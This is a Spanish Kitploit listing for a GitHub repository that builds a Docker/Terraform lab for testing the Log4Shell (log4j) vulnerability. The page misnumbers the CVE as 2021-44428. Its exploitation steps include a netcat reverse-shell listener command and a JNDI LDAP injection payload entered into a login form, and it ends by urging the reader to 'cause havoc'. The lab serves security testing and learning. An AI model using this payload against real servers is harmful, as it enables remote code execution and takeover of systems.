Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/z3bul0n/log4jtest
Seguridad de Infraestructura en la NubeSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y Educación
GitHubz3bul0n/log4jtest

log4jtest

Terraform y recursos de Docker para levantar rápidamente una prueba de CVE-2021-44428

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Introducción

Este repositorio está configurado para probar rápidamente la vulnerabilidad log4j usando Docker y Hashicorp Terraform. Todos los componentes de esta prueba se ejecutarán en contenedores Docker dentro de la red Docker, accesibles a través de 'host.docker.internal'.

Créditos / Descargo de responsabilidad

Este entorno de prueba se deriva de una excelente publicación de blog de Raxis: (https://raxis.com/blog/log4j-exploit)

La aplicación vulnerable y el código del exploit provienen de cyberxml (https://github.com/cyberxml/log4j-poc).

Todo lo que he hecho es codificar el entorno para que sea fácil de poner en marcha y probar este delicioso exploit.

No asumo ninguna responsabilidad por efectos adversos o acciones maliciosas que puedan resultar del uso del material en este repositorio. Punto final. Depende de ti decidir si estos materiales son confiables y es igualmente tu responsabilidad usar esta información de manera ética. Simplemente publico estas joyas para que investigadores, estudiantes y profesionales de seguridad puedan crear rápidamente un entorno y probar el exploit por sí mismos. Seacrest out.

Requisitos previos

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

Configuración

  1. Clona este repositorio
  2. Ejecuta 'terraform init' en el directorio del proyecto
  3. Inicia el daemon de Docker
  4. Ejecuta el script bash 'docker-build.sh' para construir todas las imágenes de contenedor del proyecto.
  5. Ejecuta 'terraform apply' para crear todos los contenedores del proyecto.

Explotación

  1. Accede al contenedor log4j_netcat usando 'docker exec -it netcat /bin/bash' o algo similar. Aquí es donde recibirás tu conexión de shell al servidor víctima una vez que se establezca.

  2. En tu sesión dentro del contenedor log4j_netcat, ingresa el siguiente comando para iniciar el listener:

root@kitploit:~
nc -lv -s 0.0.0.0 -p 9001
  1. En tu navegador, navega a http://host.docker.internal:8080/log4shell/

  2. Ingresa lo siguiente en el campo 'Username' junto con lo que quieras en el campo 'Password':

root@kitploit:~
${jndi:ldap://host.docker.internal:1389/a}
  1. Regresa al shell del contenedor log4j_netcat y observa que te has conectado al servidor víctima.

  2. ¡Ve y causa estragos!

Descargar herramienta